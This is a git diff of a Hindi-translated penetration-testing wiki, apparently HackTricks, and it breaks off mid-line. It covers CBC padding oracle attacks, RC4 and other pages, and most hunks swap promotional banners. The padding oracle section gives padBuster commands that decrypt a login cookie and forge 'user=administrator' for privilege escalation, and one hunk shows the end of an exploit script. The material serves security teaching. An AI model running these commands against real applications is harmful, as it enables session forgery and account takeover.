+{% endhint %} -# CBC - Cipher Block Chaining +# CBC - साइफर ब्लॉक चेनिंग -CBC मोड में **पिछले एन्क्रिप्टेड ब्लॉक का उपयोग IV के रूप में** किया जाता है जिसे अगले ब्लॉक के साथ XOR किया जाता है: +CBC मोड में **पिछले एन्क्रिप्टेड ब्लॉक का उपयोग IV के रूप में** किया जाता है अगले ब्लॉक के साथ XOR करने के लिए: -![CBC encryption](https://defuse.ca/images/cbc\_encryption.png) +![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png) -CBC को **डिक्रिप्ट** करने के लिए **विपरीत** **ऑपरेशन** किए जाते हैं: +CBC को डिक्रिप्ट करने के लिए **विपरीत** **ऑपरेशन** किए जाते हैं: -![CBC decryption](https://defuse.ca/images/cbc\_decryption.png) +![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png) -ध्यान दें कि एक **एन्क्रिप्शन कुंजी** और एक **IV** का उपयोग करना आवश्यक है। +ध्यान दें कि एक **एन्क्रिप्शन** **कुंजी** और एक **IV** का उपयोग करना आवश्यक है। # संदेश पैडिंग -जैसा कि एन्क्रिप्शन **निश्चित आकार के ब्लॉक** में किया जाता है, इसलिए **पैडिंग** को सामान्यत: **अंतिम ब्लॉक** में उसकी लंबाई पूरी करने के लिए आवश्यक होता है।\ -आम तौर पर **PKCS7** का उपयोग किया जाता है, जो एक पैडिंग उत्पन्न करता है **जो ब्लॉक को पूरा करने के लिए आवश्यक बाइट्स की संख्या को दोहराता है**। उदाहरण के लिए, यदि अंतिम ब्लॉक में 3 बाइट छूट रही है, तो पैडिंग `\x03\x03\x03` होगा। +जैसा कि एन्क्रिप्शन **निश्चित** **साइज** **ब्लॉक्स** में किया जाता है, इसलिए **पैडिंग** की आवश्यकता होती है **अंतिम** **ब्लॉक** की लंबाई पूरी करने के लिए।\ +आम तौर पर **PKCS7** का उपयोग किया जाता है, जो एक पैडिंग उत्पन्न करता है **आवश्यक** **बाइट्स** **की संख्या** **पूरी** **करने** के **लिए** ब्लॉक। उदाहरण के लिए, यदि अंतिम ब्लॉक में 3 बाइट्स की कमी है, तो पैडिंग `\x03\x03\x03` होगा। -एक **8 बाइट लंबाई के 2 ब्लॉक** के साथ और अधिक उदाहरणों पर ध्यान दें: +एक **8 बाइट्स की लंबाई के 2 ब्लॉक्स** के साथ और अधिक उदाहरणों पर नजर डालें: -| byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | +| बाइट #0 | बाइट #1 | बाइट #2 | बाइट #3 | बाइट #4 | बाइट #5 | बाइट #6 | बाइट #7 | बाइट #0 | बाइट #1 | बाइट #2 | बाइट #3 | बाइट #4 | बाइट #5 | बाइट #6 | बाइट #7 | | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | | P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | 6 | **0x02** | **0x02** | | P | A | S | S | W | O | R | D | 1 | 2 | 3 | 4 | 5 | **0x03** | **0x03** | **0x03** | | P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | | P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | -ध्यान दें कि अंतिम उदाहरण में **अंतिम ब्लॉक पूरा था इसलिए एक और पैडिंग के साथ एक और उत्पन्न किया गया था**। +ध्यान दें कि अंतिम उदाहरण में **अंतिम ब्लॉक पूरा था इसलिए केवल पैडिंग के साथ एक और उत्पन्न किया गया था**। # पैडिंग ऑरेकल -जब एक एप्लिकेशन एन्क्रिप्टेड डेटा को डिक्रिप्ट करती है, तो पहले वह डेटा को डिक्रिप्ट करेगी; फिर वह पैडिंग को हटाएगी। पैडिंग को साफ करते समय, यदि **अमान्य पैडिंग एक पहचानने योग्य व्यवहार को ट्रिगर** करता है, तो आपके पास एक **पैडिंग ऑरेकल संरचना** है। पहचानने योग्य व्यवहार एक **त्रुटि**, **परिणामों की कमी**, या **धीमा प्रतिक्रिया** हो सकती है। +जब एक एप्लिकेशन एन्क्रिप्टेड डेटा को डिक्रिप्ट करती है, तो पहले डेटा को डिक्रिप्ट किया जाएगा; फिर पैडिंग को हटाया जाएगा। पैडिंग को साफ करते समय, यदि **अमान्य पैडिंग एक पहचानने योग्य व्यवहार** को ट्रिगर करता है, तो आपके पास एक **पैडिंग ऑरेकल संरक्षितता** है। पहचानने योग्य व्यवहार एक **त्रुटि**, **परिणामों की कमी**, या **धीमा प्रतिक्रिया** हो सकती है। -इस व्यवहार को पहचानने पर, आप **एन्क्रिप्टेड डेटा को डिक्रिप्ट** कर सकते हैं और यहां तक कि **कोई साफ-टेक्स्ट एन्क्रिप्ट** कर सकते हैं। +यदि आप इस व्यवहार को पहचानते हैं, तो आप **एन्क्रिप्टेड डेटा को डिक्रिप्ट** कर सकते हैं और यहाँ तक कि **कोई साफ-टेक्स्ट एन्क्रिप्ट** कर सकते हैं। ## उत्पीडन कैसे करें -आप [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) का उपयोग कर सकते हैं इस प्रकार की भयंकरता का उत्पीडन करने के लिए या बस करें +आप [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) का उपयोग इस प्रकार की सुरक्षा भेदभाव का शिकार होने के लिए कर सकते हैं या बस करें ``` sudo apt-get install padbuster ``` @@ -57,25 +58,25 @@ sudo apt-get install padbuster ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" ``` -**कोडिंग 0** का मतलब है कि **base64** का उपयोग किया जाता है (लेकिन अन्य भी उपलब्ध हैं, मदद मेनू की जांच करें)। +**कोडिंग 0** यह अर्थ है कि **बेस64** का उपयोग किया जाता है (लेकिन अन्य भी उपलब्ध हैं, मदद मेनू की जांच करें)। -आप इस सुरक्षा दोष का दुरुपयोग करके नए डेटा को एन्क्रिप्ट करने के लिए भी उपयोग कर सकते हैं। उदाहरण के लिए, यदि कुकी की सामग्री "**_**user=MyUsername**_**" है, तो आप इसे "\_user=administrator\_" में बदल सकते हैं और एप्लिकेशन के अंदर वरीयताएँ बढ़ा सकते हैं। आप `paduster` का उपयोग करके भी इसे कर सकते हैं, -plaintext** पैरामीटर को निर्दिष्ट करते हुए: +आप इस सुरक्षा दोष का दुरुपयोग करके नए डेटा को एन्क्रिप्ट करने के लिए भी उपयोग कर सकते हैं। उदाहरण के लिए, यदि कुकी की सामग्री "**_**user=MyUsername**_**" है, तो आप इसे "\_user=administrator\_" में बदल सकते हैं और एप्लिकेशन के अंदर विशेषाधिकारों को उन्नत कर सकते हैं। आप `paduster` का उपयोग करके भी इसे कर सकते हैं, -plaintext** पैरामीटर को निर्दिष्ट करके: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" ``` -यदि साइट भेद्य है, तो `padbuster` स्वतः प्रयास करेगा कि पैडिंग त्रुटि कब होती है, लेकिन आप इसे **-error** पैरामीटर का उपयोग करके त्रुटि संदेश को भी दिखा सकते हैं। +यदि साइट वंर्नरबल है, तो `padbuster` स्वचालित रूप से कोशिश करेगा कि पैडिंग त्रुटि कब होती है, लेकिन आप इसे **-error** पैरामीटर का उपयोग करके त्रुटि संदेश को भी निर्दिष्ट कर सकते हैं। ```bash perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" ``` ## सिद्धांत -**सारांश में**, आप सही मानों की अनुमान लगाकर शुरू कर सकते हैं जो सभी **विभिन्न पैडिंग** बनाने के लिए उपयोग किए जा सकते हैं। फिर, पैडिंग ऑरेकल हमला शुरू होगा जो अंत से शुरू तक बाइट्स को डिक्रिप्ट करने लगेगा जिसे यह अनुमान लगाएगा कि कौन सा सही मान होगा जो **1, 2, 3** आदि का पैडिंग बनाता है। +**सारांश में**, आप सही मानों की अनुमान लगाकर एन्क्रिप्टेड डेटा का डिक्रिप्शन शुरू कर सकते हैं जो सभी **विभिन्न पैडिंग** बनाने के लिए उपयोग किए जा सकते हैं। फिर, पैडिंग ऑरेकल हमला शुरू होगा जो अंत से शुरू तक बाइट्स को डिक्रिप्ट करने लगेगा जिसे अनुमान लगाकर पता लगाया जाएगा कि **1, 2, 3, आदि कैसे पैडिंग बनाई जा सकती है**। ![](<../.gitbook/assets/image (629) (1) (1).png>) -कल्पना करें कि आपके पास कुछ एन्क्रिप्टेड पाठ है जो **2 ब्लॉक्स** को बनाता है जिनमें से बाइट्स **E0 से E15** तक हैं।\ -**अंतिम** **ब्लॉक** (**E8** से **E15**) को **डिक्रिप्ट** करने के लिए, पूरे ब्लॉक को "ब्लॉक साइपर डिक्रिप्शन" के माध्यम से गुजरना होगा जो **इंटरमीडिएट बाइट्स I0 से I15** उत्पन्न करेगा।\ -अंततः, प्रत्येक इंटरमीडिएट बाइट पिछले एन्क्रिप्टेड बाइट्स (E0 से E7) के साथ **XORed** किया जाएगा। इसलिए: +कल्पना करें कि आपके पास कुछ एन्क्रिप्टेड पाठ है जो **E0 से E15** तक के बाइट्स द्वारा बने **2 ब्लॉक** में ले लेता है।\ +**अंतिम ब्लॉक** (**E8** से **E15**) को **डिक्रिप्ट** करने के लिए, पूरे ब्लॉक को "ब्लॉक साइपर डिक्रिप्शन" के माध्यम से गुजरना होगा जिससे **इंटरमीडिएट बाइट्स I0 से I15** उत्पन्न होंगे।\ +अंततः, प्रत्येक इंटरमीडिएट बाइट पिछले एन्क्रिप्टेड बाइट्स (E0 से E7) के साथ **XORed** किया जाएगा। इस प्रकार: * `C15 = D(E15) ^ E7 = I15 ^ E7` * `C14 = I14 ^ E6` @@ -83,42 +84,27 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon * `C12 = I12 ^ E4` * ... -अब, **`E7` को `C15` `0x01` तक मॉडिफाई करना संभव है**, जो एक सही पैडिंग होगा। इसलिए, इस मामले में: `\x01 = I15 ^ E'7` +अब, **`C15` को `0x01` तक बनाने के लिए `E7` को संशोधित करना संभव है**, जो एक सही पैडिंग होगा। इसलिए, इस मामले में: `\x01 = I15 ^ E'7` -इसलिए, `E'7` ढूंढने के बाद, **I15 की गणना संभव है**: `I15 = 0x01 ^ E'7` +इसलिए, `E'7` खोजने पर, यह **संभव है कि हम I15 की गणना कर सकें**: `I15 = 0x01 ^ E'7` -जो हमें **C15 की गणना करने की अनुमति देता है**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` +जो हमें **`C15` की गणना करने की अनुमति देता है**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` -**C15** को जानकर, अब **C14 की गणना संभव है**, लेकिन इस बार पैडिंग `\x02\x02` को ब्रूट-फोर्स करना होगा। +**C15** को जानने के बाद, अब **`C14` की गणना करना संभव है**, लेकिन इस बार पैडिंग `\x02\x02` को ब्रूट-फोर्स करना होगा। -यह बीएफ पिछले एक के तुलना में इसी कठिनाई का है क्योंकि यह संभव है कि `E''15` की गणना की जाए जिसका मान 0x02 है: `E''7 = \x02 ^ I15` इसलिए बस **`E'14`** ढूंढना होगा जो **`C14` को `0x02` के बराबर बनाता है**।\ +यह बीएफ पिछले एक के तुलना में इसी कठिनाई का है क्योंकि यह संभव है कि `E''15` की गणना की जाए जिसका मान 0x02 है: `E''7 = \x02 ^ I15` इसलिए बस **`E'14`** खोजने की आवश्यकता है जो एक **`C14` को `0x02` के बराबर** उत्पन्न करता है।\ फिर, C14 को डिक्रिप्ट करने के लिए एक ही कदम उठाएं: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** -**पूरे एन्क्रिप्टेड पाठ को डिक्रिप्ट करने तक इस श्रृंखला का पालन करें।** +**इस श्रृंखला का पालन करें जब तक आप पूरे एन्क्रिप्टेड पाठ को डिक्रिप्ट नहीं कर लेते।** -## सुरक्षितता की खोज +## संक्रमण की पहचान -एक खाता रजिस्टर करें और इस खाते से लॉग इन करें।\ -यदि आप **कई बार लॉग इन** करते हैं और हमेशा **एक ही कुकी** प्राप्त करते हैं, तो एप्लिकेशन में **कुछ गड़बड़ हो सकती है**। लॉग इन करने पर प्रेषित कुकी **हर बार अद्वितीय होनी चाहिए**। यदि कुकी **हमेशा** **एक ही** है, तो यह संभावना है कि यह हमेशा मान्य रहेगी और उसे **अमान्य करने का कोई तरीका नहीं होगा**। +एक खाता पंजीकृत करें और इस खाते से लॉग इन करें।\ +यदि आप **कई बार लॉग इन** करते हैं और हमेशा **एक ही कुकी** प्राप्त करते हैं, तो एप्लिकेशन में **कुछ गलती** हो सकती है। वापस भेजी गई कुकी हर बार जब आप लॉग इन करते हैं, **अद्वितीय होनी चाहिए**। यदि कुकी **हमेशा** **एक ही** है, तो यह संभावना है कि यह हमेशा मान्य रहेगी और उसे **अमान्य करने का कोई तरीका नहीं होगा**। -अब, यदि आप **कुकी** को **संशोधित** करने की कोशिश करते हैं, तो आप एप्लिकेशन से **त्रुटि** प्राप्त करते हैं।\ -लेकिन यदि आप पैडिंग को बीएफ करते हैं (उदाहरण के लिए पैडबस्टर का उपयोग करके), तो आपको एक और कुकी प्राप्त करने में सफलता मिलती है जो एक विभिन्न उपयोगकर्ता के लिए मान्य है। यह स्थिति पैडबस्टर के लिए अत्यधिक संभावित रूप से विकल्पयोग्य है। +अब, यदि आप कुकी को **संशोधित** करने की कोशिश करते हैं, तो आप एप्लिकेशन से **त्रुटि** प्राप्त करते हैं।\ +लेकिन यदि आप पैडिंग को ब्रूट-फोर्स करते हैं (उदाहरण के लिए पैडबस्टर का उपयोग करके), तो आपको एक और कुकी प्राप्त करने में सफलता मिलती है जो एक विभिन्न उपयोगकर्ता के लिए मान्य होती है। यह परिदृश्य पैडबस्टर के लिए अत्यधिक संभावित है। -# संदर्भ +## संदर्भ * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) - - -
- -जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! - -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **PDF में HackTricks डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स और हैकट्रिक्स क्लाउड गिटहब रेपो में पीआर जमा करके। - -
diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md index f16d8a112..40c0fb26e 100644 --- a/cryptography/rc4-encrypt-and-decrypt.md +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} यदि आप किसी प्लेनटेक्स्ट को RC4 का उपयोग करके एन्क्रिप्ट कर सकते हैं, तो आप उस RC4 द्वारा एन्क्रिप्ट किए गए किसी भी सामग्री को (एक ही पासवर्ड का उपयोग करके) केवल एन्क्रिप्शन फ़ंक्शन का उपयोग करके डिक्रिप्ट कर सकते हैं। diff --git a/emails-vulns.md b/emails-vulns.md index 8f7cd8824..fc41fdd13 100644 --- a/emails-vulns.md +++ b/emails-vulns.md @@ -1,29 +1,35 @@ -# ईमेल सुरक्षा की कमियाँ +# ईमेल सुरक्षा दोष + +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥 +हैकट्रिक्स का समर्थन करें -* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।** -* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।** +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} ## -## +## + +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥 +हैकट्रिक्स का समर्थन करें -* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।** -* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।** +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md index be86605cf..95eda3a8c 100644 --- a/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/exploiting/linux-exploiting-basic-esp/fusion.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} # Level00 @@ -70,16 +71,17 @@ buf += "\x65\xd9\x0f\x01" r.send(buf) r.interactive() ``` +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md index 2fbfb206c..38117add3 100644 --- a/exploiting/tools/pwntools.md +++ b/exploiting/tools/pwntools.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की 